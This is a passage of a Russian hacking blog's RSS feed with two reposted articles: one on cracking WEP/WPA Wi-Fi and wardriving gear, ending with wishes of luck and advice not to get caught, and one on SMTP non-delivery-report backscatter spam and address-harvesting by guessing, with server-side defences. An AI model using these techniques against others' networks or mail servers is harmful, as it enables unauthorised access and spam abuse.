Для предотвращения лобовой атаки производители беспроводного оборудования увеличили длину секретной части ключа до 104 бит, попутно породив проблему обратной совместимости. Добавь сюда 24 бита вектора инициализации и получишь так называемое 128-битное шифрование. Подобрать 104-битный ключ вслепую уже нереально: при прежней скорости перебора в среднем на это уходит 2.817.001.333.840.509.768.000 часов, или 3.215.754.947.306.518 веков, что значительно превышает не только оставшееся время существования Солнца, но и Вселенной в целом :). Однако хакерам удалось найти более короткий путь, сократив время взлома в миллиарды раз.<br />
В августе 2001 года три криптоаналитика (Scott Fluhrer, Itsik Mantin и Adi Shamir) опубликовали свою подрывную статью &#171;Слабые места алгоритма распределения ключей RC4&#8243; (&#171;Weaknesses in the Key Scheduling Algorithm of RC4&#8243;), которая мгновенно стала знаменитой и определила название всего семейства атак этого типа, &#8212; FMS-attack (по первым буквам фамилий первооткрывателей Fluhrer-Mantin-Shamir). Они обнаружили существование крупных классов слабых (weak) ключей, в которых крошечная часть битов ключа оказывает значительное влияние на зашифрованные данные. Поскольку в формировании эффективного ключа участвует вектор инициализации, генерируемый произвольным образом, в общий шифропоток неизбежно попадает некоторое количество слабых ключей. Собрав достаточный объем трафика, злоумышленник отбирает пакеты, зашифрованные слабыми ключами (такие пакеты называются слабыми или интересными). Каждый слабый пакет с 5% степенью вероятности восстанавливает один байт секретного ключа, поэтому общее количество пакетов, которые атакующий должен собрать для реализации атаки, в первую очередь зависит от степени его везучести. В среднем для взлома требуется порядка шести миллионов зашифрованных пакетов. В зависимости от интенсивности трафика и пропускной способности канала, на это уходит от нескольких часов до нескольких дней, хотя в некоторых случаях атака успешно заканчивается уже через несколько минут. И это при 104-битном ключе! Так работает AirSnort и многие другие хакерские утилиты, которые любой злоумышленник может свободно скачать из Сети.<br />
Если обмен данными между легальными клиентами и точкой доступа незначителен или практически отсутствует, злоумышленник может заставить жертву генерировать большое количество трафика, даже не зная секретного ключа. Достаточно просто перехватить правильный пакет и, не расшифровывая, ретранслировать его вновь. ARP-запрос вызовет неизбежный ARP-ответ. Отличить APR-запросы от всех остальных пакетов очень просто: frame.pkt_len == 68 и wlan.da == FF:FF:FF:FF:FF:FF. Обычно для передачи запросов используется отдельная WLAN-карта (при этом расстояние между антеннами приемной и передающей карт должно составлять, по меньшей мере, 15 сантиметров), хотя некоторые карты ухитряются перехватывать трафик и одновременно с этим бомбардировать жертву пакетами.<br />
Хакеры лаборатории H1kari of Dasb0den Labs усилили FMS-алгоритм, сократив количество необходимых пакетов с шести миллионов до 500 тысяч. А в некоторых случаях 40/104-битный ключ взламывается всего с тремя тысячами пакетов, что позволяет атаковать даже домашние точки доступа, не напрягая их избыточным трафиком. Усиленный алгоритм атаки реализован в утилите dwepcrack, входящей в состав пакета BSD-airtools, а также в другом хакерском инструментарии.<br />
Разработчики оборудования отреагировали вполне адекватным образом, изменив алгоритм генерации векторов инициализации так, чтобы слабые ключи уже не возникали. Даже dwepcrack&#8217;у требовалось перехватить свыше 10 миллионов пакетов, но даже в этом случае успешная расшифровка ключа не гарантирована. Устройства, выпущенные после 2002-2003 года, скорее всего, уже защищены от FMS-атаки, а более древние модели решают эту проблему обновлением прошивки (правда, не все производители выпустили такое обновление). Но даже сегодня, в середине 2005 года, в эксплуатации находится множество уязвимых устройств, особенно на периферии, куда уходят все нереализованные складские запасы. Тем не менее, ситуация сложилась так, что хакерам пришлось искать новые пути для атак.<br />
В августе 2004 года хакер по имени KoreK продемонстрировал исходный код нового криптоанализатора, взламывающего даже сильные векторы инициализации. Для восстановления 40-битного ключа ему требовалось всего 200 000 пакетов с уникальными векторами инициализации, а для 104-битного &#8212; 500 тысяч. Количество пакетов с уникальными векторами в среднем составляет порядка 95% от общего количества зашифрованных пакетов, так что для восстановления ключа атакующему потребуется совсем немного времени. Данный алгоритм реализован в chopper&#8217;е, aircrack&#8217;е, WepLab&#8217;е и других хакерских утилитах.<br />
В новом оборудовании, построенном по технологии WPA – Wi-Fi Protected Access (защищенный Wi-Fi-доступ), вновь была усилена защищенность беспроводных устройств. На место WEP пришел TKIP (Temporal Key Integrity Protocol &#8212; протокол краткосрочной целостности ключей), генерирующий динамические ключи, сменяющие друг друга с небольшим интервалом времени. Для совместимости с существующим оборудованием TKIP использует тот же самый потоковый алгоритм шифрования, что и WEP, – RC4, но в каждый зашифрованный пакет теперь укладывается специальный 8-байтный код целостности сообщения, рассчитанный по алгоритму Michael и предотвращающий ретрансляцию подложных пакетов. Процедура аутентификации осуществляется по протоколу EAP (Extensible Authentication Protocol – расширенный протокол аутентификации), который использует либо а) RADIUS-сервер (Remote Authentication Dial-In User Service &#8212; служба дистанционной аутентификации пользователей по коммутируемым линиям); либо б) предустановленный общий ключ PSK (pre-shared key). В процессе аутентификации сервер генерирует парный мастер-ключ (PMK &#8212; Pairwise Master Key) и передает его клиенту. Несмотря на относительную новизну этой технологии, в комплект airckrack&#8217;a уже входит специальный модуль WZCOOK, отображающий PMK-ключ :). Для несанкционированного подключения к точке доступа, защищенной технологией WPA, этого оказалось вполне достаточно. Впрочем, атакующий модуль недостаточно отлажен и в некоторых случаях не срабатывает.<br />
Стандарт IEEE 802.11i описывает более продвинутую систему безопасности (известна под именем WPA2), основанную на криптоалгоритме AES. Готовых утилит для ее взлома в открытом виде пока не наблюдается, так что с этой технологией можно чувствовать себя в безопасности. По крайней мере, какое-то время она продержится :). Обладателям устаревшего оборудования настоятельно рекомендуем пробить VPN-тоннели (Virtual Private Network – виртуальная частная сеть), задействовать SSL-шифрование или подключить любые другие способы защиты, изначально ориентированные на небезопасные каналы передачи данных.<br />
Вардрайвинг &#8212; не совсем взлом<br />
Вардрайвинг – это не обязательно &#171;взлом&#187;. Часто атакующий ограничивается тем, что находит открытую точку доступа, но не подключается к ней. Во-вторых, вардрайвинг ни внешне, ни внутренне не похож на дизассемблирование защищенных программ или написание вирусов. Это делает занятие вардрайвингом непохожим на другие способы взлома в привычном для нас понимании. В вардрайвинге намного больше романтики, чем, например, в сексе с отладчиком :). С другой стороны, если ломать программы умеют единицы, то стать классным вардрайвером сможет практически любой.<br />
Кто занимается вардрайвингом<br />
Вардрайвингом занимаются в основном романтики :), хотя отмечены единичные случаи хищения кредитных карт и другой конфиденциальной информации через WLAN. У вардрайвера вряд ли может возникнуть много амбиций, скорее, азарт и сладострастное чувство, что ты кого-то поимел. Подавляющее большинство атакующих действуют без злого умысла, воспринимая это как шалость или интеллектуальную игру. Но встречаются и настоящие охотники за чужим трафиком, из которого можно извлечь различную конфиденциальную информацию (пароли на почтовые ящики, номера кредитных карт и т.д.), и просто желающие подключиться к интернету за чужой счет.<br />
Кто-то вардрайвит за деньги, но таких немного. Даже в Штатах точки доступа еще не распространены настолько, чтобы на их взломе было возможно добывать пропитание. Тех, кто конструирует уникальное железо, &#8212; единицы. Тех, кто пишет софт, &#8212; десятки. Сотни или даже тысячи пользуются готовым железом/софтом, а еще больше тех, кто просто интересуется этим занятиям, но не рискует вардрайвить на практике. Мы относимся к последним :).<br />
Использование готового снаряжения не требует теоретической подготовки, выходящей за рамки навыков владения мышью, зато физическая подготовка весьма желательна, так как вычисленных вардрайверов в нашей стране практически никогда не передают в прокуратуру – только &#171;братков&#187; к ним посылают.<br />
Источник информации для вардрайверов – форумы, в которых можно найти и свежие хакерские программы, и хитрые приемы взлома, и все остальное. Эрудиции продвинутого пользователя будет вполне достаточно. Но для написания атакующего софта требуется глубокая теоретическая подготовка и интуиция. Над проблемой взлома корпят не только программисты, но и криптографы, причем последние обычно работают на легальной основе и публикуют свои научные труды, которые уже переваривают программисты.<br />
Инструменты вардрайвера<br />
Если говорить об оснащении вардрайвера, то, как правило, это карманный компьютер или ноутбук, снабженный WLAN-картой на основе чипсета Prism (его поддерживает подавляющее большинство программ), внешней антенной (обычно направленного типа) и соответствующим ПО. Добротная антенна направленного типа, снабженная усилителем мощности, уверенно держит связь на расстояниях до 1,5-2 км, а в некоторых случаях и больше.<br />
Такую антенну вместе с усилителем можно купить совершенно легально. Их выпускает Hyper Technology, Broadcast Warehouse, &#171;Радиал&#187; и многие другие компании. Среди хакеров большой популярностью пользуется направленная антенна HG2415Y типа Radome-Enclosed (компания HyperLink Technology), которую можно заказать по интернету. Рассчитанная на стационарный монтаж, она, тем не менее, неплохо чувствует себя на фотографическом штативе или даже на обыкновенном ружейном прикладе, превращающем ее в мобильный инструмент для слежения за подвижными жертвами. Параболические антенны действуют на расстояниях, ограниченные, фактически, лишь горизонтом видимости, но они катастрофически немобильны, а для хакера самое главное &#8212; вовремя смотаться с места взлома. В общем, для вардрайвинга подходит практически любая антенна направленного типа на 2,4 ГГц (она же антенна стандарта IEEE 802.11b/802.11g или WLAN).<br />
Из программного обеспечения понадобятся: сканер, снифер и взломщик паролей. Их можно найти практически под любую платформу. На Pocket PC обычно используется связка MiniStumbler/Sniffer Portable/Airscanner Mobile. MiniStumbler обнаруживает присутствие сети в данной точке, измеряет интенсивность сигнала, отображает SSID/MAC-адреса и определяет, задействовано WEP-шифрование или нет. Sniffer Portable и Airscanner Mobile грабят все пролетающие мимо пакеты и записывают их в файл, который затем переносится на ноутбук или настольный ПК и пропускается через взломщик паролей (процессорных ресурсов карманного компьютера для взлома паролей за разумное время пока недостаточно).<br />
Распространенный снифер под Linux и BSD &#8212; Kismet, изначально ориентированный на исследовательские цели. Он поддерживает массу оборудования и беспроводных протоколов, удобен в использовании и к тому же абсолютно бесплатен. Перехватывает сетевой трафик, показывает SSID- и MAC-адреса, подсчитывает количество пакетов со слабыми векторами инициализации и т.д. Из взломщиков паролей в последнее время реально работают только aircrack и WepLap, причем первый работает значительно лучше.<br />
Под Windows перехват беспроводного трафика реализуется гораздо сложнее, и кроме снифера потребуются модифицированные версии драйверов для WLAN-карты. Из коммерческих сниферов можно порекомендовать Airopeek, из некоммерческих &#8212; утилиту airdump (входит в состав aircrack, портирована под Windows). Еще можно использовать Sniffer Pro.<br />
На Mac&#8217;ах весь хакерский инструментарий собран в одном флаконе &#8212; утилита KisMAC, настолько простая, что ей сможет пользоваться даже ребенок. Здесь есть и сетевой сканер, и снифер, и парольный переборщик (brute force), и криптоанализатор слабых векторов инициализации. Предусмотрена даже такая мелочь, как планировщик, позволяющий осуществлять атаки по расписанию :).<br />
Как охотиться<br />
Можно, например, просканировать периметр своего обитания, поднявшись на балкон и вооружившись параболической антенной на 2,4 ГГц. Представь: сидишь себе в засаде, пьешь пиво, сканируешь периметр и ждешь, когда жертва попадет в силки. Через неделю, максимум через две, оперативная обстановка будет изучена, и что тогда? А тогда карманный компьютер или ноутбук &#8212; и вперед на колеса. Если колес нет, вполне подойдет троллейбус или трамвай. Они и внимания меньше привлекают, и за дорогой следить не надо.<br />
На Западе и у нас<br />
Конечно, западные и азиатские тусовки более многочисленны и продвинуты. У нас, несмотря на мягкий климат никем не соблюдаемых законов, вардрайвинг распространяется довольно сдержанно. Отчасти это объясняется апатичностью отечественной публики, отчасти ориентацией не на процесс, а на результат.<br />
Каждый оценивает крутость вардрайвера по-своему. Настоящие профи шифруются и молчат. Этап самоутверждения у них остался позади, зато иметь проблемы с законом или &#171;братками&#187; им неохота. Они посещают тематические форумы, но практически не оставляют сообщений. В самых жарких дискуссиях, как правило, участвуют новички, соревнующиеся, &#171;кто больше взломает&#187;.<br />
А что с безнаказанностью? Да у нас вообще высокий уровень преступности. Суды переполнены намного более важными делами, чем какой-то там вардрайвинг, а сотрудники милиции заняты вопросами собственного пропитания. Но даже честный следователь не может начать дело, пока не будет заявления от истца и каких-нибудь доказательств. В практическом плане для истца это означает постоянные повестки в суд, длительные разбирательства по поводу наличия всех сертификатов, комплекса охранных мер и т.д. На Западе такие шалости не проходят и уже есть реальный пример того, как засудили вардрайвера.<br />
Сомнительная мобильность<br />
Может показаться, что вардрайвинг безопаснее банального стационарного взлома, так как сам вардрайвер становится мобильнее и его сложнее вычислить физически. Напротив. Стационарный взлом через цепочку надежных прокси или сотовый телефон, купленный с рук, а после звездного часа закатанный в асфальт, вполне безопасен, и хакера обычно вяжут уже на продаже ворованной информации. Вардрайвер привлекает больше внимания. Вокруг респектабельных зданий полно камер, фиксирующих номера машин, и простых охранников хватает, а у них на эти вещи глаз наметан. Так что мобильность мобильностью, а питать иллюзий на этот счет не стоит.<br />
Вардрайвинг &#8212; охота на точки доступа Wi-Fi и получение контроля над ними.<br />
Вардрайвингом занимаются скорее для спортивного интереса, чем для получения ценной информации. Иногда и просто ради халявного доступа в интернет.<br />
Пока еще не научились ломать стандарт IEEE 802.11i. Но долго ли он продержится?<br />
Для вардрайвинга, по сути, нужны только ноутбук, направленная антенна и специальный софт.<br />
Направленные антенны продаются совершенно легально.<br />
Вряд ли тебя посадят за вардрайверство, но могут серьезно &#171;наехать&#187;.<br />
That&#8217;s all, Folks! ^_^ Если кто-то будет этим заниматься, то удачи вам всем!:))<br />
И ещё&#8230; Всё нужно делать с умом, чтобы вас не поймали!!!</p>
Файл 7f5ddbf668be432bbaf47f6ed1d47c4b/sape.php не найден!]]></content:encoded>
			<wfw:commentRss>http://suspended.ru/2010/05/%d0%bd%d0%b0%d0%b7%d0%b2%d0%b0%d0%bd%d0%b8%d0%b5-252/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>NDR-атаки: проблемы и решения</title>
		<link>http://suspended.ru/2010/05/%d0%bd%d0%b0%d0%b7%d0%b2%d0%b0%d0%bd%d0%b8%d0%b5-253/</link>
		<comments>http://suspended.ru/2010/05/%d0%bd%d0%b0%d0%b7%d0%b2%d0%b0%d0%bd%d0%b8%d0%b5-253/#comments</comments>
		<pubDate>Thu, 13 May 2010 05:05:30 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
				<category><![CDATA[Хакерство]]></category>
		<category><![CDATA[взлом]]></category>
		<category><![CDATA[обман]]></category>
		<category><![CDATA[пароли]]></category>

		<guid isPermaLink="false">http://suspended.ru/?p=561</guid>
		<description><![CDATA[Среди множества хитроумных трюков, применяемых спаме- рами (и хакерами), NDR-атаки имеют особое место, пос- кольку они основаны на фундаментальных спецификациях, описывающих работу протокола SMTP (Simple Mail Transfer Protocol — Простой протокол доставки почты). Пусть слово «простой» не вводит тебя в заблуждение. SMTP — основной протокол, прямых конкурентов у которого нет и, по-видимому, уже не будет [&#8230;]]]></description>
				<content:encoded><![CDATA[<p style="text-align: justify;"><img class="alignleft size-full wp-image-76" style="margin: 10px;" title="internet" src="http://suspended.ru/wp-content/uploads/2010/05/internet260.jpg" alt="интернет" />Среди множества хитроумных трюков, применяемых спаме-<br />
рами (и хакерами), NDR-атаки имеют особое место, пос-<br />
кольку они основаны на фундаментальных спецификациях,<br />
описывающих работу протокола SMTP (Simple Mail Transfer<br />
Protocol — Простой протокол доставки почты). Пусть слово «простой»<br />
не вводит тебя в заблуждение. SMTP — основной протокол, прямых<br />
конкурентов у которого нет и, по-видимому, уже не будет (IMAP4 можно не<br />
брать в расчет, это все-таки экзотика, а SMTP — «рабочая лошадка»).<br />
RFC, SMTP, NDR<br />
Свое название NDR-атаки получили по первым буквам выражения<br />
Non-Delivery Report (отчет о недоставке почты).<span id="more-561"></span> Всякий раз, когда SMTP-<br />
сервер не может доставить письмо (скажем, по причине отсутствия<br />
указанного адреса), он возвращает сообщение об ошибке с кодом 5xx,<br />
которое может выглядеть, например, так: «550 5.7.1 Unable to relay for<br />
kk@sendmail.ru», после чего разрывает TCP/IP-соединение. Однако<br />
сервер может и принять сообщение, отложить его в очередь, оповещая<br />
отправителя положительным кодом завершения операции (250).<br />
Когда же в процессе обработки письма выяснится, что доставлять его<br />
некому, сервер, как порядочный гражданин, возвратит письмо адресату<br />
с объяснением причины невозможности доставки (здесь уместно<br />
провести аналогию с «улиточной» почтой). Вот это самое уведомление<br />
и называется Non-Delivery Report, или сокращенно NDR. Теоретически<br />
формат отчета специфицирован в RFC-3464 (An Extensible Message<br />
Format for Delivery Status Notifications — Открытый формат сообщений,<br />
уведомляющих о статусе доставки), однако в реальной жизни он варьи-<br />
руется в весьма широких пределах. Одни серверы помещают исходную<br />
копию письма во вложение, а сам отчет (составленный, как правило, на<br />
английском языке) кладут в основное тело сообщения. Другие же в целях<br />
экономии трафика отправляют только отчет, добавляя к нему короткий<br />
фрагмент исходного письма, включающий как минимум заголовок и не-<br />
сколько первых строк (чтобы отправитель мог разобраться, какое именно<br />
письмо «пострадало»).<br />
В общем, уведомления о недоставке — стандартная и внешне вполне<br />
безобидная фича, реализованная еще в незапамятные времена. Каза-<br />
лось бы, ну чем она может быть полезна хакерам? Однако с ней связано<br />
целых две атаки: использование SMTP-сервера в качестве proxy (bounce<br />
message или backscatter-attack) и поиск валидных адресов (trial-n-error<br />
attack).<br />
Backscatter-attack<br />
Термин backscatter перекочевал в хакерскую среду из физики, где он<br />
означает отклонение волн от исходной траектории по тем или иным причинам. Применительно к SMTP-серверам backscatter<br />
«символизирует» процесс отскока или отбивания посланного сообщения.<br />
Такая атака также часто называется bounce message attack.<br />
Один из крупнейших дефектов SMTP-протокола заключается в отсутствии<br />
штатных механизмов проверки аутентичности обратного адреса отпра-<br />
вителя сообщения. Сервер всецело полагается на адрес, оставленный<br />
отправителем в поле «MAIL FROM:», не делая никаких попыток его про-<br />
верки, а потому злоумышленник может запросто подставить любой адрес,<br />
какой ему вздумается, и именно туда сервер возвратит сообщение при не-<br />
возможности его доставки конечному получателю. Что делает злоумыш-<br />
ленник? Он берет адрес жертвы, прописывает его в поле «MAIL FROM:», а<br />
в поле «RCPT TO:» подставляет координаты заведомо несуществующего<br />
получателя. Если сервер не является ретранслятором (также называемым<br />
релеем — от английского relay), то есть берется за доставку корреспонден-<br />
ции лишь своим локальным адресатам, то он с вероятностью, близкой к<br />
единице, отобьет сообщение еще на стадии заполнения поля «RCPT TO:»<br />
и атака не состоится. Впрочем, некоторые серверы, в частности MicrosoftExchange Server, имеют довольно дурную систему поиска имен и зачастую<br />
принимают сообщения до проверки пользователя на существование.<br />
Что же касается ретрансляторов (к которым де-факто принадлежат все<br />
публичные серверы, такие, например, как mail.ru), то они вообще не в со-<br />
стоянии определить существование нелокальных пользователей и потому<br />
принимают все письма без разбора. Лишь потом, в случае невозможности<br />
доставки, они посылают отправителю (или, точнее говоря, тому лицу, чей<br />
адрес указан в поле «MAIL FROM:») соответствующее уведомление.<br />
Ну и как это можно использовать для атаки? И тем более для спама? Ведьрассылка уведомлений по множественным адресам запрещена, и потому<br />
атакующему для отправки N писем размером в K мегабайт придется<br />
израсходовать N*K мегабайт своего трафика. А это ровно столько, сколько<br />
тратится при так называемой директивной рассылке, когда атакую-<br />
щий вообще не прибегает к услугам промежуточных SMTP-серверов, а<br />
связывается с каждым получателем напрямую и кладет в его почтовый<br />
ящик конверт со спамом (или с вирусом — неважно). Потому-то хакеры и<br />
стремятся использовать открытые ретрансляторы, допускающие задание<br />
в поле «RCPT TO:» множества адресатов. В идеале (если количество<br />
адресов неограничено) атакующий тратит лишь K мегабайт собственного<br />
трафика, остальные же почтовый сервер оплачивает из своего кармана.<br />
Однако с каждым днем находить открытые ретрансляторы становится все<br />
труднее и труднее. Практически все почтовые серверы устанавливают<br />
жесткие лимиты на максимальное количество сообщений, передаваемых<br />
в единицу времени, и либо вообще запрещают множественную рассылку,<br />
либо соглашаются доставлять письмо ограниченному числу получателей<br />
(как правило, не более шести).<br />
Стоп! А зачем атакующему нужны открытые ретрансляторы, если широкие DSL-каналы сегодня не роскошь, а средство передвижения? К тому же<br />
исходящий трафик обычно либо совсем бесплатный, либо тарифици-<br />
руется по весьма льготным ценам. Сегодня каждый может позволить<br />
себе арендовать канал, о котором вчера добрая половина провайдеров<br />
не могла и мечтать! Кажется, что в сложившихся условиях директивная<br />
рассылка должна стать основным орудием спамеров, но&#8230;<br />
В том-то и дело, что при практической реализации атаки сразу же всплы-<br />
вает множество «но». Большинство корпоративных (да и публичных)<br />
серверов попросту не примет письмо неизвестно от кого. Поэтому как<br />
минимум потребуется обзавестись доменным именем третьего уровня и<br />
воздвигнуть собственный почтовый сервер (хотя бы чисто формальный).<br />
А для этого уже желательно иметь статический IP, хотя доменное имя<br />
третьего уровня можно бесплатно зарегистрировать и на динамическом.<br />
В результате некоторых манипуляций мы добились того, что почтовые<br />
серверы начинают принимать от нас корреспонденцию. Но стоит только<br />
начать рассылать спам, как уже через несколько часов атака потухнет,<br />
как бычок в писсуаре. Используя распределенные черные списки (они<br />
же блэк-листы), почтовые серверы очень быстро заблокируют наш IP-<br />
адрес (а то и всю подсеть). В случае статического адреса это еще ничего<br />
(моя селедка, что хочу с ней, то и делаю), а вот блокировка динамичес-<br />
кого IP (или всей подсети) создает огромные проблемы для провайдера,<br />
который тут же отключает хакера. Вот так со всего маху и отключает. Пря-<br />
мым ударом. В челюсть. Ведь попасть в черные списки намного проще,<br />
чем выбраться оттуда, да и процедура «реабилитации» обычно далеко<br />
не бесплатна. А количество провайдеров (даже в крупном городе) хоть и<br />
велико, но все-таки ограничено.<br />
Короче, директивная рассылка оправдывает себя только на ботнетах<br />
— пишем червя, заражаем несколько десятков тысяч машин и ре-<br />
транслируем письма их руками. Но ведь ботнет еще создать нужно! К<br />
тому же, в отличие от спама (юридический статус которого до сих пор<br />
не определен), это уже является довольно серьезным правонаруше-<br />
нием, особенно если в число зараженных узлов попадут компьютеры<br />
различных секретных ведомств. В таких случаях пощады ждать, как<br />
правило, не приходится и приговор оказывается очень суров, а суди-<br />
мость (пускай даже условная) — это все-таки судимость, существенно<br />
ограничивающая гражданина в правах.<br />
И тут на помощь спамерам приходят backscatter-атаки. Злоумышленник,<br />
используя различные SMTP-серверы, рассылает корреспонденцию,<br />
подставляя адрес получателя в поле «MAIL FROM:» и указывая заведомо<br />
несуществующего пользователя в поле «RCPT TO:». Несмотря на то что<br />
подлинный IP-адрес спамера остается в заголовке письма (помещаемо-<br />
го сервером во вложение или в основное тело сообщения), существую-<br />
щие фильтры не настолько интеллектуальны, чтобы достать его оттуда,<br />
и потому заносят в черный список IP почтового сервера, рассылающего<br />
уведомления о невозможности доставки сообщений. Поскольку таких<br />
серверов очень много (данным условиям отвечает практически любой SMTP-сервер, даже не являющийся ретранслятором), они не кончатся<br />
никогда, и на недостаток в них спамер навряд ли сможем пожаловаться.<br />
А вот для владельцев самих атакованных серверов настанут мрачные<br />
деньки, и им придется совершить нехилые телодвижения, доказывая,<br />
что никакого спама они не рассылали!<br />
Как защититься от подобных атак? Нет ничего проще! Достаточно<br />
как следует покопаться в настройках сервера. Прежде всего, следует<br />
включать в отчет о недоставке только фрагмент исходного сообще-<br />
ния (заголовок плюс пара-тройка строк), что сделает его совершенно<br />
бесполезным для спамеров, и они потеряют к нему всякий интерес. Если<br />
же это невозможно (например, сервер не поддерживает таких настроек),<br />
задействуй режим замедления SMTP-ответов, установив задержку в<br />
несколько секунд для неавторизованных пользователей. Конечно, это<br />
слегка замедлит производительность сервера, но&#8230; что поделаешь!<br />
Между «скорострельностью» и безопасностью приходится выбирать<br />
что-то одно.<br />
Trial-n-error attack<br />
Спамеры заинтересованы в отправке сообщений только на действу-<br />
ющие адреса, и уведомления о недоставке тут приходятся как нельзя<br />
кстати. В частности, ошибка типа «mailbox is full» говорит, что получа-<br />
тель, скорее всего, забил на этот ящик и уже давно его не использует,<br />
а потому он заполнен до предела. Но это мелочи. Главная проблема<br />
спамеров — сбор адресов. Для их поиска разрабатываются хитроумные<br />
программы-харвестеры (от английского harvester — «собиратель»),<br />
блуждающие по просторам Сети и анализирующие web-странички, а<br />
также проникающие на уязвимые узлы и сканирующие адресную книгу.<br />
Однако пользователи не дураки. Свою основную мыльницу на форумах<br />
уже давно никто не оставляет, а бесплатные ящики, создаваемые на<br />
короткое время на серверах типа mail.ru, спамерам не очень интересны,<br />
да и фильтры там стоят достаточно мощные.<br />
Наибольший доход приносит рассылка по корпоративным адресам. Вот<br />
только как эти самые адреса найти? А почему бы не воспользоваться<br />
перебором по словарю? А что! Пользователи склонны выбирать короткие<br />
и легко запоминающиеся адреса, как правило, состоящие из имени (с<br />
добавленным к нему годом, когда такое имя уже кем-то занято), попу-<br />
лярных слов типа mafia, hacker, supermen или инициалов в стиле kk, что<br />
расшифровывается как Kris Kaspersky. Когда-то у меня был такой адрес<br />
на sendmail&#8217;е. Спаму туда сыпалось огромное количество. Чуть меньше<br />
доставалось n2k, зарегистрированному на том же сервере. Четырехсим-<br />
вольный алиас kpnc чувствовал себя довольно уверенно — спаму туда<br />
приходило относительно немного, но все-таки значительно больше,<br />
чем на kris.kaspersky. Отсюда вывод: любые короткие имена (неваж-<br />
но, словарные они или нет) легко находятся тривиальным подбором.<br />
Атакующий просто отправляет большое количество писем, перебирая<br />
различные буквенно-цифровые комбинации, и ловит NDR-уведомления от почтового сервера. Несуществующие адреса отметаются<br />
сразу, а вот на остальные направляется стабильный поток<br />
незапрошенной корреспонденции. Для экономии трафика<br />
тело тестового письма обычно содержит минимум символов<br />
и зачастую просто состоит из нескольких байт.<br />
Исследование, проведенное автором этой статьи, показало,<br />
что одно-, двух- и трехсимвольные комбинации представ-<br />
лены на популярных почтовых серверах достаточно полно<br />
и покрывают около двух десятков тысяч действующих<br />
адресов. Причем, в отличие от адресов, почерпнутых из спа-<br />
мерских баз (за которые еще платить надо), короткие имена<br />
намного медленнее устаревают, поскольку их владельцам<br />
жалко с ними расставаться. Даже если они выберут другое<br />
короткое имя — ну и что с того? Оно также будет найдено<br />
методом перебора.<br />
Четырехсимвольные имена перебирать труднее, посколь-<br />
ку из двух миллионов комбинаций реально используется<br />
жалкая сотня тысяч или даже и того меньше. К тому же от-<br />
правка двух миллионов писем — процедура нетривиальная,<br />
привлекающая к себе внимание. Рассылка начнет давиться<br />
фильтрами задолго до того, как спамер успеет пожать плоды<br />
своих трудов. Пятисимвольные имена лобовым перебором<br />
уже не находятся в принципе, точнее, находятся, конечно,<br />
но&#8230; смысл? Разослать сто миллионов писем, чтобы собрать<br />
ту же сотню тысяч адресов?<br />
Другое мощное оружие — перебор по словарю. Кстати го-<br />
воря, принятая система раздачи адресов в корпорациях (по<br />
имени и/или фамилии сотрудников) этому только способс-<br />
твует, поскольку, во-первых, существуют словари имен и фа-<br />
милий. Во-вторых, даже если какая-то конкретная фамилия<br />
в таком словаре отсутствует (например, Вуглускреб), то она<br />
все равно содержит предсказуемые корни и подчиняется<br />
правилам чередования гласных и согласных, что сущест-<br />
венно ограничивает перебор.<br />
Короткий лингвистический ликбез. Большинство русских (и<br />
японских) имен содержит одинаковое количество попе-<br />
ременно чередующихся гласных и согласных (Таня, Маня,<br />
Мазепа, Иванов, Сидоров). Имена, включающие в себя<br />
несколько подряд идущих гласных, также широко распро-<br />
странены, но сочетаний подряд идущих согласных очень<br />
и очень немного, причем в различных языках они разные.<br />
Мы с трудом выговариваем сочетание th, в то время как<br />
американцы приходят в ужас от слова «защищающиеся»<br />
(попытайся записать его латиницей, и пусть тебя охватит<br />
гордость за наш язык :)).<br />
Естественно, все, что известно лингвистам, известно и<br />
хакерам (тем более что об этом можно прочесть в любом лин-<br />
гвистическом учебнике, там же даны и таблицы распространенности различных сочетаний звуков и букв). Учитывая,<br />
что гласных в латинском алфавите только шесть, нетрудно<br />
подсчитать, сколько наберется «осмысленных» имен,<br />
сгенерированных с учетом лингвистических особеннос-<br />
тей (простейшие генераторы, которые легко найти в Сети,<br />
исходят из предположения, что гласных и согласных должно<br />
быть поровну). Более сложные программы, использующие<br />
замороченные психофизические модели, как правило,<br />
распространяются за деньги, однако и те и другие дают<br />
поразительный результат и эффективно находят даже девя-<br />
тисимвольные имена, разумеется, без учета словаря.<br />
Как вариант — можно использовать словарь и программу-<br />
модификатор, переставляющую буквы местами, записыва-<br />
ющую «O» как ноль, «l» как единицу, набирающую русские<br />
имена латинскими буквами с учетом их расположения на<br />
клавиатуре: Марина — Vfhbyf и т.д.<br />
Короче говоря, даже если нигде не светить свое мыло,<br />
настырные спамеры его все равно найдут (исключение<br />
составляют длинные — свыше пяти-шести символов<br />
— имена, состоящие из одних согласных букв, цифр и спец-<br />
символов). Можно ли защититься от подобных атак? На<br />
уровне почтового сервера — можно. Достаточно генериро-<br />
вать сообщение о недоставке в ответ на все подозритель-<br />
ные сообщения и даже на все сообщения с неизвестным<br />
адресатом (то есть таким адресатом, которому получатель<br />
сообщения ранее не отправлял никакой корреспонден-<br />
ции). Практика показывает, что честные пользователи<br />
сразу (или через некоторое время) повторяют попытку<br />
отправки вновь, в то время как спамеры тут же заносят<br />
такой адрес в список несуществующих. Кстати говоря,<br />
поскольку спамеры анализируют уведомления о недостав-<br />
ке не вручную, а с помощью программ, выдирающих из тела<br />
письма код ошибки, то имеет смысл добавить в уведомле-<br />
ние русский текст, предлагающий пользователю отправить<br />
сообщение еще раз, чтобы тот зря не нервничал, полагая,<br />
что ошибся адресом.</p>
Файл 7f5ddbf668be432bbaf47f6ed1d47c4b/sape.php не найден!]]></content:encoded>
			<wfw:commentRss>http://suspended.ru/2010/05/%d0%bd%d0%b0%d0%b7%d0%b2%d0%b0%d0%bd%d0%b8%d0%b5-253/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>NUKE</title>
		<link>http://suspended.ru/2010/05/%d0%bd%d0%b0%d0%b7%d0%b2%d0%b0%d0%bd%d0%b8%d0%b5-254/</link>
		<comments>http://suspended.ru/2010/05/%d0%bd%d0%b0%d0%b7%d0%b2%d0%b0%d0%bd%d0%b8%d0%b5-254/#comments</comments>
		<pubDate>Thu, 13 May 2010 05:05:30 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
				<category><![CDATA[Хакерство]]></category>
		<category><![CDATA[взлом]]></category>
		<category><![CDATA[обман]]></category>
		<category><![CDATA[пароли]]></category>

